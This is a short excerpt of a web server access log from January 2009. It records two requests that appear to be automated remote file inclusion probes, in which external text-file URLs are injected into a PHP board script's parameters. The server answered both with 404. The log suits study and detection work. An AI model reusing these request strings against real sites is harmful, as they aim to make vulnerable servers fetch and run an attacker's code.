83.19.243.146 - - [13/Jan/2009:09:32:26 -0600] "GET /@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
200.57.158.195 - - [13/Jan/2009:09:32:51 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
